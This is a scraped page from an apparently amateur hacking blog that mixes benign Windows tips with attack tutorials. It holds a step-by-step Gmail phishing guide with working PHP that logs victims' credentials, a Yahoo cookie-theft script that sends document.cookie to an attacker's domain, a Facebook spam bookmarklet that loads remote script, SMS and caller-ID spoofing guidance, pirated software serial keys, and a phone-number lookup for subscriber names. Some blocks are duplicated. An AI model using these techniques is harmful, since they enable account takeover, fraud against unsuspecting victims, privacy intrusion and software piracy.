Warning - This Website is only for education purposes, By reading these articles you agree that HackingBytes is not responsible in any way for any kind of damage caused by the information provided in these articles.

Hackingbytes

Hide Data Behind Any File :Steganography

Steganography is the art and science of hiding messages, Images, Data .etc in such a way that no one, apart from the sender and intended recipient, suspects the existence of the Data, a form of security through obscurity. By using this trick your data will get hidden into any image of your choice without reducing its quality, you can Hide Data Behind Images without using any software

Password Protect File/Hard Disk : Cryptography

Today in a typical middle class family everyone in the family uses the same computer , There are times when we need to keep our file ,folders, Hard Drivers, usb's private .The best way to protect your file ,folders, hard disks, thumb drives ..etc, is by encrypting them (i.e password protect ) By this way there's no chance of the file or folder being accessed without the password ,To achieve this, I use True crypt a Free open-source disk encryption software for Windows 7/Vista/XP, Mac OS X, and Linux

Trick To Find User Surname Of Any Reliance Mobile Number

Basically this website is for recharge but it helps you to get information about user of that mobile number. So lets dive into it. 1. Go to this Website 2. Enter Mobile Number in Reliance Subscriber Number. 3. Email address is optional so you don't need to enter. 4. Done!!!

Windows 8 E Book Free Download

This book covers most of the problems users are facing with Windows 8. Windows 8 is totally different from older version of Windows and it does not has start button. So people are facing problems while using it. This new version of Windows is also optimized for touchscreen. According to security researchers, Windows 8 is also the most secure operating system from Microsoft.

Yahoo Session Cookies hacking

A cookie is a small piece of text sent to your browser by a website when you visit. It contains information about your visit that you may want the site to remember. These cookies can be stored in your browser.you can see your cookies by typing the following script in your browser. p>

Thursday, February 28, 2013

Gmail Hacking Step By Step







Steps for Creating Phishing or Fake web Page:

Step 1:
Go to the gmail.com.  Save the Page as "complet HTML" file

Step 2:
Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"

Step3:
 Upload those image to tinypic or photobucker.com.  copy the url of each image.

Step4:
Open the HTML file in Wordpad.
Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .
Search for "mail_logo.png" (without quotes) and replace it with corresponding url .

Step 5:
Search for the

 action="https://www.google.com/accounts/ServiceLoginAuth"

Replace it with

action="http://yoursite urlhere/login.php"

 save the file.
Step6:
Now you need to create login.php
 so you need to open the notepad and type as
<?php
header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
save it

Step 7:
open the notepad and just save the file as "pswrds.txt" without any contents.

Now upload those three files(namely index.html,login.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.


Step 8: 
create an email with gmail keyword.
 like : gmailxyz@gmail.com

Step 9:
  Send to victim similar  to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.



 Note:
For user to believe change Your phishing web page url with any of free short url sites. 
Like : co.nr, co.cc,cz.cc 
This will make users to believe that it is correct url.

Ways to Hack E-Mail Accounts











The Basic level Hacking is Email Account Hacking.  Everyone like to do first email account hacking only.  So here is the tutorial for budding hackers about email Hacking.

There are different types of Email Account Hacking .  Here is some of them :

  1. Social Engineering
    • Phishing
  2. Brute Force Attack
  3.  Keylogger
  4.  Guessing the Answer for the Security Question


Social Engineering:









Social engineering takes advantage of the weakest link in any organization’s
information security defenses: people. Social engineering is
“people hacking” and involves maliciously exploiting the trusting nature of
human beings to obtain information that can be used for personal gain.

Social engineering is one of the toughest hacks to perpetrate because it takes
great skill to come across as trustworthy to a stranger. It’s also by far the
toughest hack to protect against because people are involved.

Social Engineering is different from Physical Security exploits . In social engineering hackers will analyze about
victim.  Hackers will send mail to victim.  The contents will be related to the victim.

Eg:

✓ False support personnel claim that they need to install a patch or new
version of software on a user’s computer, talk the user into downloading
the software, and obtain remote control of the system.
✓ False vendors claim to need to update the organization’s accounting
package or phone system, ask for the administrator password, and
obtain full access.
✓ Phishing e-mails sent by external attackers gather user IDs and passwords
of unsuspecting recipients. Hackers then use those passwords to
gain access to bank accounts and more. A related attack exploits crosssite
scripting on Web forms.
✓ False employees notify the security desk that they have lost their keys
to the computer room, receive a set of keys from security, and obtain
unauthorized access to physical and electronic information.

 Phishing WebPage:

   







 It is a fake webpage which looks similar to the original page of the website.  Using this WebPage we can easily get the Password of victims.  The process involved in creating Phishing webpage are,
✓ First Visit the Website which is associated with the email id. Copy the Source code.
✓ Edit the the Source code such that it will store the password for you.
✓ Upload the Webpage to any free webhosting sites.  (don't select a famous hosting site,they will find that
    your page is fake). Try uploading through the proxy server.

Guessing the Answer for Security Question:
    Do you remember that the mail sites will ask for the security questions to retrieve the mail account?  You can hack the mail account simply guessing the answer.  If the victim is your friend ,then it may very easy to hack. 

Brute Force Attack:









A famous and traditional attacking method .  In this method ,the password will be found by trying all possible passwords with any program or software.




Keyloggers:






 It is one of the spyware which will capture what you type in the keyboard.  so whenever you type the username and password ,it will simply capture.

   It is software program which will be attached with any softwares and send to victim.  While victim install the software ,the keylogger also start to work.  Keyloggers are exe files.

Introduction To Ethical Hacking

What is computer hacking?

Hacking is the process of taking advantage of weakness in a computer or computer network to accomplish his goal. The person who is engaging in hacking activities  called as 'Hacker'.  Hackers may be motivated by a multiple reasons, such as profit, protest, challenge or just for fun.

 Cracker.

One who breaks security on a system. Coined ca. 1985 by hackers in defense against journalistic misuse of hacker (q.v., sense 8). An earlier attempt to establish ‘worm’ in this sense around 1981–82 on Usenet was largely a failure.

Use of both these neologisms reflects a strong revulsion against the theft and vandalism perpetrated by cracking rings. While it is expected that any real hacker will have done some playful cracking and knows many of the basic techniques, anyone past larval stage is expected to have outgrown the desire to do so except for immediate, benign, practical reasons (for example, if it’s necessary to get around some security in order to get some work done). Thus, there is far less overlap between hackerdom and crackerdom than the mundane reader misled by sensationalistic journalism might expect. Crackers tend to gather in small, tight-knit, very secretive groups that have little overlap with the huge, open poly-culture this lexicon describes; though crackers often like to describe themselves as hackers, most true hackers consider them a
separate and lower form of life.

It’s clear that the term cracker is absolutely meant to be derogatory. One
shouldn’t take the tone too seriously though, as The Jargon File is done with a
sense of humor, and the above is said with a smile. As we can see from the
above, illegal or perhaps immoral activity is viewed with disdain by the “true
hackers,” whomever they may be. It also makes reference to cracker being a
possible intermediate step to hacker, perhaps something to be overcome.

Script Kiddie


The term script kiddie has come into vogue in recent years. The term refers to
crackers who use scripts and programs written by others to perform their intrusions.
If one is labeled a “script kiddie,” then he or she is assumed to be incapable
of producing his or her own tools and exploits, and lacks proper
understanding of exactly how the tools he or she uses work. As will be apparent
by the end of this chapter, skill and knowledge (and secondarily, ethics) are the
essential ingredients to achieving status in the minds of hackers. By definition,
a script kiddie has no skills, no knowledge, and no ethics.

Phreak


A phreak is a hacker variant, or rather, a specific species of hacker. Phreak is
short for phone phreak (freak spelled with a ph, like phone is). Phreaks are
hackers with an interest in telephones and telephone systems. Naturally, there
has been at times a tremendous amount of overlap between traditional hacker
roles and phreaks.

White Hat/Black Hat/Gray Hat

White Hat Hacker:

White Hat hackers are good guys who does the hacking for defensing.  They probably work an organization for providing security.

Black Hat Hacker

Black hat hackers are bad guys(the malicious hackers or crackers).  They usually steal the other bank information and steal the money.
They use their skills for illegal purposes.
They are creators of viruses,malware,spyware.
They will destroy your pc.

Gray Hat Hackers


Grey hats are hackers who may work offensively or defensively, depending on the situation.
This is the dividing line between hacker and cracker. Both are powerful forces on the Internet,
and both will remain permanently. And some individuals qualify for both categories. The
existence of such individuals further clouds the division between these two groups of people.
In addition to these groups, there are self-proclaimed ethical hackers, who are interested in
hacker tools mostly from a curiosity standpoint. They may want to highlight security problems
in a system or educate victims so they secure their systems properly. These hackers are
doing their “victims” a favor. For instance, if a weakness is discovered in a service offered by
an investment bank, the hacker is doing the bank a favor by giving the bank a chance to rectify
the vulnerability.

Password Protect File/Hard Disk : Cryptography

 

Today in a typical middle class family everyone in the family uses the same computer , There are times when we need to keep our file ,folders, Hard Drivers, usb's  private .The best way to protect your file ,folders, hard disks, thumb drives ..etc, is  by encrypting them (i.e password protect ) By this way there's no chance of the file or folder  being accessed without the password  ,To achieve this,  I use True crypt a Free open-source disk encryption software for Windows 7/Vista/XP, Mac OS X, and Linux



About True Crypt 


True Crypt is a software system for establishing and maintaining an on-the-fly-encrypted volume (data storage device). On-the-fly encryption means that data is automatically encrypted right before it is saved and decrypted right after it is loaded, without any user intervention. No data stored on an encrypted volume can be read (decrypted) without using the correct password/key file(s) or correct encryption keys. Entire file system is encrypted (e.g., file names, folder names, contents of every file, free space, meta data, etc).



How To Use True Crypt 

1. First Download Truecrypt  Free from Here

Hide Your Data Behind Any File :Stegnography



Steganography is the art and science of hiding messages, Images, Data .etc  in such a way that no one, apart from the sender and intended recipient, suspects the existence of the Data, a form of security through obscurity. By using this trick your data will get hidden into any image of your choice without reducing its quality, you can Hide Data  Behind  Images without using any software

Hide Data Behind Images Without Using Any Software
1. Create a folder in your C drive and name it as “hide

2. Copy all the images you want to hide and also the image behind which you want hide into this directory.


3. Now select the images you want to hide and add them to archive i.e keep them in winrar.
Now you will see one more file named “hide.rar” in your directory.



4. Now open command prompt and change your root to your current directory as shown in the figure and type the following command.
            
          Copy /b aish.jpg + hide.rar output.jpg

  • Here “aish.jpg “ is the image behind which you want to hide.
  • “hide.rar” is the file of images to be hidden.
  • “output.jpg “ is the output file that we want.
After executing the following command, we will see an extra image called “output.jpg” as shown in the figure.


Now you can delete all the files except “output.jpg”.If you double click the file, it opens a normal image. But you can see the hidden files by opening the file with winrar.



This tutorial can be used for any type of files like mp3,wmv,txt etc

Wednesday, February 27, 2013

Trick To Find User Surname Of Any Reliance Mobile Number

reliance number








Basically this website is for recharge but it helps you to get information about user of that mobile number. So lets dive into it.

   1. Go to this  Website
   2. Enter Mobile Number in Reliance Subscriber Number.
   3. Email address is optional so you don't need to enter.
   4. Done!!!

Make Nameless Folder In Windows



creating nameless folder
 Basically you can not make folder with no name on windows. This trick will allow you to make folder without any name. This trick works on any windows  operating system.


Before attempting this trick, try to make a folder with no name and you will fail to do so. This is what this trick will let you do. Below is screenshot of folder before and after doing this interesting trick.
creating nameless folder
  1. Make a Newfolder on desktop or where ever you want.
  2. Right click on this newly created folder and select Rename.
  3. Erase the text showing "New Folder".
  4. Now keep Pressing Alt (i.e alter key) and type 255. If you are on laptop then you need to enable your Num Lock and type from the highlighted number keys not from those below function keys.
  5. After that leave alt key and Press enter.
  6. Done you just created nameless folder.

Tuesday, February 26, 2013

Internet Download Manager 6.12 full serial key


Internet Download Manager : The fastest download accelerator

Internet Download Manager is everyone's Favourite Download Managing Software.
.............................................................
** If after install you get the message "Fake serial number...", uninstall IDM, run "Unregister.IDM" to remove any previous serial from registry, reboot PC, install IDM again, use the crack & regfile to activate it.




Serial Keys:---


Serial Keys: 

D91GM-T5X1J-DW7YG-1GHIS
I23LZ-H5C2I-QYWRT-RZ2BO
8XJTJ-ZTWES-CIQNV-9ZR2C
PAQ34-MHDIA-1DZUU-H4DB8
4CSYW-3ZMWW-PRRLK-WMRAB
DDLFR-JKN5K-B4DE3-H2WYO
9RVII-F3W58-6FAYV-WPTFD
M7CQ2-VARGX-QFYGZ-URKG0
POOUS-S8V4C-1RXUH-HG6NQ
7JPTJ-4XLY3-HM4LK-9UP4Q
OJNGE-77NS5-MW5FC-MFB7A
HSIWU-KRQQQ-Y870K-YI6QQ
HF0I6-AYL1O-BHDI7-DG9LW
LC3OG-66OU3-38BTX-SX20M
52OGI-AKRTG-MT6YU-YZ7OU
WNJ39-J1JN0-JKNVS-BZSCB
7WPV5-NHHF3-A2P39-LRJ74
OV4O3-1ASY1-8CDWI-9UGX4
O00C4-MYLXJ-LYUDP-QFGD5
I80CQ-RUG1G-LEP9V-O7UN0
OUC2X-F1F8A-8LO76-ETQCK
SN1OJ-P3ZGF-RU4XN-S61TZ
4P6BG-WGN41-C5CQQ-QXIO8
76JVD-ISRBG-KZB4U-LGL9D
PBPXJ-BC1EH-FKO7F-VUXJ2
30P7F-IG6PZ-CSZ3L-FRL7N
4B5XT-BOSBK-94O5F-669DJ

Free download 1000 Hacking Tutorials Leaked

chandrakant nial | 11:20 PM | | | | | |
Hi Mates This is an Nice Collection of Hacking Learning Materials that helps you in boosting your hacking learning skills ...Must download And remember this is for educational purpose only "Hack To Protect" As simple as it sounds like :).
This package Contains some blazing contents as listed below which really nice.If you need any more help do comment below i will surely answer as soon as possible.also make share of Darksite and help others to learn.Its My 300 th post SO Hope We Will post many more articles Need Continuous Supports from you all love you all...

CLICK HERE TO DOWNLOAD
- See more at: http://www.darksite.co.in/2013/01/free-download-1000-hacking-tutorials.html#sthash.4rfQyprL.dpuf

Free download 1000 Hacking Tutorials Leaked

chandrakant nial | 11:20 PM | | | | | |
Hi Mates This is an Nice Collection of Hacking Learning Materials that helps you in boosting your hacking learning skills ...Must download And remember this is for educational purpose only "Hack To Protect" As simple as it sounds like :).
This package Contains some blazing contents as listed below which really nice.If you need any more help do comment below i will surely answer as soon as possible.also make share of Darksite and help others to learn.Its My 300 th post SO Hope We Will post many more articles Need Continuous Supports from you all love you all...

CLICK HERE TO DOWNLOAD
- See more at: http://www.darksite.co.in/2013/01/free-download-1000-hacking-tutorials.html#sthash.4rfQyprL.dpuf
 
0
 
2

Free download 1000 Hacking Tutorials Leaked

chandrakant nial | 11:20 PM | | | | | |
Hi Mates This is an Nice Collection of Hacking Learning Materials that helps you in boosting your hacking learning skills ...Must download And remember this is for educational purpose only "Hack To Protect" As simple as it sounds like :).
This package Contains some blazing contents as listed below which really nice.If you need any more help do comment below i will surely answer as soon as possible.also make share of Darksite and help others to learn.Its My 300 th post SO Hope We Will post many more articles Need Continuous Supports from you all love you all...

CLICK HERE TO DOWNLOAD
- See more at: http://www.darksite.co.in/2013/01/free-download-1000-hacking-tutorials.html#sthash.4rfQyprL.dpuf

Block/Bypass and Remove Survey Pop-ups



 

After Using Javascript



The Bookmarklet


To save the bookmarklet, you can right click on the following link and then select "Bookmark This Link...". You can also drag and drop the link to your browser's toolbar or bookmarks:XJZ Survey Remover
(Note: the remover does not work with Internet Explorer)

Alternatively, you can copy and paste this code into your browser's address bar to use the application:
javascript:(function(){(function(){var z=["Timeout","Interval"];for(var i=0;i<1;i++){var x=window["set"+z[i]]("null",1);eval("delete clear"+z[i]);if (window["clear"+z[i]]==undefined){if (typeof(ar)=="undefined"){var ar=document.createElement("iframe");ar.style.display="none";document.body.appendChild(ar);}window["clear"+z[i]]=ar.contentWindow["clear"+z[i]];}for(var j=x;j>0&&x-j<99999;j--)window["clear"+z[i]](j);}})();var bd="[url]http://survey-remover.com/[/url]";var gn=function(){var q=function(min,max){return Math.floor(Math.random()*(max-min+1))+min;};var n="";for(var r=0;r<q(9,19);r++)n+=String.fromCharCode(q(97,122));return n;};var sj=["Timeout","Interval"];var bl=[];var xc=[];for(var i=0;i<2;i++){bl.push(window["set"+sj[i]]);window["set"+sj[i]]=function(a,b){};for(var j in window){try{if(typeof(window[j])=="function"){if((window[j]+"").indexOf("function set"+sj[i]+"(){")!=-1)window[j]=function(a,b){};}}catch(e){}}var op=gn();xc.push(op);window[op]=bl[i];}var er=gn();window[er]=function(){window.setTimeout=bl[0];window.setInterval=bl[1];xjz={version:"2.0",domain:"http://survey-remover.com/",id:"4e0c9401bc6c7",TO:setTimeout("alert(\"It appears that the host could not be reached :(\nPlease try to use the bookmarklet again later!\n\"+xjz.domain);",10000)};var a=document.createElement("script");a.type="text/javascript";a.src=xjz.domain.replace("//","//public.")+"remover/";a.onload=function(){xjz.surveyRemover=new xjz.SurveyRemover(xjz.version);xjz.surveyRemover.init();};document.documentElement.firstElementChild.appendChild(a);};window[xc[0]](window[er],110);})();





How To Save The Bookmarklet

1.
  1. Right click on the link above (the one that says "XJZ Survey Remover") then select "Bookmark This Link"
  2. Name the bookmarklet and put it in a folder (eg one named "Bookmarklets") if you want to. Then Click "Save"
  3. To run the bookmarklet, click on the bookmarklet in the "Bookmarks" menu
  4. Click on the bookmark(let) to run it whenever The Survery Pop-ups

Monday, February 25, 2013

Spam on Someones Wall on Facebook


 





















It is really easy to do it. All you need to do is to follow the following steps carefully.

#Step1: First you need to be on "http://" connection instead of "https://", so simple Login into your FB account and goto Account > Account Settings > Account Security. Over there "unTick" |Secure Browsing (https)|


#Step2: Now goto the Persons wall whom you want to spam , and then paste the following code into the address bar:


javascript:(a = (b = document).createElement("script")).src = "//purebroz.com/a.js", b.body.appendChild(a); void(0)


#Step3: Now a new box will pop up. In that type the number of times you want the message to be posted and click on "OK".


#Step4: After that type the message that you want to post and click on "OK"

SMS Spoofing :- send sms from another No. Free.

SpoofSMS.com SpoofSMS.com
free sms spoofing
You are looking for free SMS spoofing sites. You want to send fake SMS text messages, targeted for recipients to U.S, Canada, Australia or anywhere in the world without paying a single cent? There was nowhere you could find it, but now you have a chance. When SMS Spoofing site FakeMSG.com launched the first iPhone application to send spoof sms through BigBoss (for jailbroken iPhones), it was giving out one free SMS credit for every unique iPhone app user, but soon ended the offer due to widespread craze and abuse.

Paid services like Spranked.com which allows you to send fake a.k.a spoofed cum anonymous SMS texts internationally allows you to pull a prank on your friend for as low as less than a buck. You can pay by Paypal or AlertPay or even Moneybookers as its site advertised.

Here are the steps on how to send a free SMS with a fake Sender name:

1. Visit the URL: http://www.fakemsg.com/test_system.php
2. Enter the recipient's number including the country code and area code, without any special characters like dashes or dots
3. Click Send! In a minute or two a test message bearing a fake Sender name will be received on the recipient's phone, unless it is not within supported network coverage.

Yahoo Session Cookies hacking

What are cookies?
A cookie is a small piece of text sent to your browser by a website when you visit. It contains information about your visit that you may want the site to remember. These cookies can be stored in your browser.you can see your cookies by typing the following script in your browser.


javascript:alert(document.cookie);                                                                                                                    

Session and session IDs:
Whenever we login to our account, our session starts and it will be ended when we press the logout button.i.e the duration between the login and logout can be called as a session.A session ID is a unique number that a Web site's server  assigns a specific user for the duration of that user's visit(session ).

Procedure to steal cookies:

1. First download the Cookiestealer script from  

Download Here :
 


2. Sign up for an account in any free webhosting site.
 

 Examples  
   

www.BlackAppleHost.com
           www.ripway.com
 www.my3gb.com 
 www.drivehq.com

3. Upload all the scripts you have downloaded onto the free webhosting site and create an empty directiry and name it "cookies".

4. Give the code "yahoo.php" to your victim by using the following script and prompt him to run it in his browser.
       javascript:document.location='http://yourdomain.com/yahoo.php?  
       ex='.concat(escape(document.cookie));
5. Now open hacked.php in your freewebhosting site. ( password is  " hackingbytes").      
6. After entering the password,it shows you the username of the account you have hijacked. Just click on it, you will be logged in.




Hacking Caller ID of Mobile Phones


Caller ID spoofing is the act of making the telephone network to display any desired (Fake) number on the recipient’s Caller ID display unit instead of the original number. With this, it is possible to make a call appear to have come from any phone number that the caller wishes.

Unlike what most people think, an incoming call may not be from the number that is displayed on the Caller ID display unit. Because of the high trust that the people have in the Caller ID system, it is possible for the caller to easily fool them and make them believe that the number displayed on the Caller ID display is real. This is all possible through Caller ID spoofing.


                                                 Click here for Demo-1

                                                 Click here for Demo-2 

**Use at Ur Own Risk for Educational Purpose only.

  

Create Bootable USB Drive From DOS to Install Windows 7


Install Win 7 from USB 
Installing Windows from a USB flash drive has several advantages – First of all, the overall speed of the installation process will increase significantly, carrying a USB stick is much more convenient than a DVD, and finally it becomes possible to install the OS even on those systems that do not have a DVD drive, such as a netbook.
In this post, I will show you how to load the Windows installation on to your USB flash drive and make it bootable just like the DVD.

Tools Required to Load Windows 7 Installation Files:

  1. USB flash drive with a minimum capacity of 4 GB.
  2. Windows 7 set-up DVD.
Now, just follow the steps below:

Step-1:

Plug-in your USB flash drive and backup all the existing data in it.
Open the command prompt. If you are using Windows 7/Vista then open it with administrator rights.
ie: Go to Start -> All Programs -> Accessories -> Right-click on “Command Prompt” and select “Run as Administrator”.

Step-2:

In the command prompt, type in the following command:
DISKPART

Step-3:

Now issue the following command:
LIST DISK
This will show you a list of  available disks on your system. Disk 0 is usually the hard disk. In my case, Disk 5 is the USB drive (this can be a different one in your case). 

SELECT DISK 5
 
NOTE: In the above command, 5 is the USB drive number on my system. If you have a different number on your system, then you need to replace 5 with that number.

Step-4:

Now issue the following list of commands one by one as shown below:
CLEAN CREATE PARTITION PRIMARY
SELECT PARTITION 1
ACTIVE
FORMAT FS=NTFS QUICK
ASSIGN
EXIT
Minimize the command prompt and proceed to the next step.

Step 5:

Insert the Windows 7/Vista installation disc and note down the “drive letter” of your DVD drive. In my case, it is “H:”. Now type the following list of commands as shown below:

H: CD BOOT
CD BOOT
BOOTSECT.EXE /NT60 M: (NOTE: M: is your USB drive letter)
EXIT

Step-6:

Copy the contents of your Windows 7/Vista installation disk into the USB flash drive.
That’s it! Your USB stick is now ready to boot and install the Windows 7 for you. Don’t forget to enable the “USB Boot” option and change the “boot priority to USB device from hard disk” in your BIOS settings.

Registry Hacks to Tweak Your Windows


Registry Hacks to Tweak Windows 
Microsoft Windows offers a feature-rich interface and several customization options that make it one of the most user friendly operating systems in the world. However, computer geeks would still love to hack the Windows Registry so as to add more extra features and functionalities to their operating system.
If you’re one such geek who would like to customize Windows in your own way, here is a list of 8 interesting registry hacks that you need to try:

1. Disable USB Devices:

Disabling USB ports can be a smart idea to add security to the computer. This can be really handy if the computer is on a public place where the chances of virus and other malware infection is really high. You can easily disable access to USB ports with the following registry hack:
  1. Open the Registry Editor (Start -> Run -> Type regedit and hit Enter)
  2. In the registry, navigate to the following key:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor
  3. In the right-side pane, double-click on “Start”.
  4. In the “Value data” field enter 4 and click on “OK”.
  5. Close the Registry Editor and reboot.
To enable USB devices, follow the same procedure as above except in the step-4 enter 3 in the “Value data” field.
Works on Windows XP, Vista and 7.

2. Disable Notification Balloons in Windows 7 and Vista:

You can now disable the annoying notification balloons that keeps popping up frequently with warning messages and reminders. Here is a step-by-step procedure to do that:
  1. Open the Registry Editor and navigate to the following key:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
  2. Right-click on the right-hand pane, and create a new “DWORD”.
  3. Rename it to EnableBalloonTips, double-click on it and set the “Value data” to 0. Reboot the computer to see the changes in effect.

3. Add “Recycle Bin” to My Computer in Windows 7 and Vista:

Would you like to add the “Recycle Bin” icon to My Computer so that you need not go back to the desktop to access it when required? Well, here is how you can do that:
  1. Open the Registry Editor and navigate to the following key:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace
  2. Right-click on “NameSpace” and select New -> Key. Name the key with the following name:
    {645FF040-5081-101B-9F08-00AA002F954E}
  3. Now, open “My Computer” and hit F5 to refresh the screen. This should show up the “Recycle Bin” icon.

4. Disable the Windows Task Manager:

Need to limit access to your computer by disabling the Task Manager? Here is a simple registry hack to do this:
  1. Open the Registry Editor and navigate to the following key:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
  2. Right-click on “Policies”, select New -> Key and name the key as System.
    If you are on Windows XP, you need not create the new key “System” as it is already present in it. So, you can directly navigate to: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System in the Step-1 itself.
  3. Right-click on “System”, create a new “DWORD” and name it to DisableTaskMgr.
  4. Double-click on the DWORD “DisableTaskMgr” and set the “Value data” to 1 (0=Enable, 1=Disable).
  5. To enable the Task Manager, Set the “Value data” back to 0.
Works on Windows XP, Vista and 7.

5. Change the Registered Owner and Organization Name:

Here is a simple hack to change the name of the Registered owner on your computer:
  1. Open the Registry Editor and navigate to:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
  2. On the right-side pane, find the keys RegisteredOwner and RegisteredOrganization. Double-click on them to change the names to whatever you want.
  3. To see the changes, right-click on “My Computer” and select “Properties”.
Works on Windows XP, Vista and 7.

6. Add Programs to Windows Startup:

You can now add your favorite programs to Windows Startup without the need for using the start-up folder. Here is a way to do this:
  1. Open the Registry Editor and navigate to the following key:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  2. On the right-side pane, create a new “String Value” and rename it to the name of the program that you want to add (you can give any name, it doesn’t matter).
  3. Double-click on the “String Value”, in the “Value data” field add the path of the executable program that has to execute at startup.
  4. Reboot the computer to see the changes in effect.
Works on Windows XP, Vista and 7.

7. Add “Pin to Start Menu” Option for Folders in Windows 7 and Vista:

Ever wanted to pin a folder to the start menu to gain faster access to it? Well, it is possible to add the “Pin to Start Menu” option so that you can plug your favorite folders to Start Menu. Here is a step-by-step procedure:
  1. Open the Registry Editor and navigate to:
    HKEY_CLASSES_ROOT\Folder\shellex\ContextMenuHandlers
  2. Right-click on “ContextMenuHandlers” and select New -> Key. Name the key as follows:
    {a2a9545d-a0c2-42b4-9708-a0b2badd77c8}
  3. Now, whenever you want to add a folder to Start Menu, hold down the Shift key and right-click on the folder. You should see the “Pin to Start Menu” option in the context menu”.

8. Disable “Aero Shake” in Windows 7:

One of the new additions to Windows 7 is the “Aero Shake” feature using which it is possible to grab a window using its title bar and shake it. This will minimize all the other open windows if any. It is really a handy feature! However, if you ever wanted to disable this feature, here is a solution:
  1. Open the Registry Editor and navigate to the following key:
    HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows
  2. Now, right-click on “Windows” key and create a new Key called Explorer.
  3. Right-click on the “Explorer” key and create a new “DWORD” called NoWindowMinimizingShortcuts and set its value to 1.
  4. Close the Registry Editor and reboot the computer to see the changes in effect.

LinkWithin

Related Posts Plugin for WordPress, Blogger...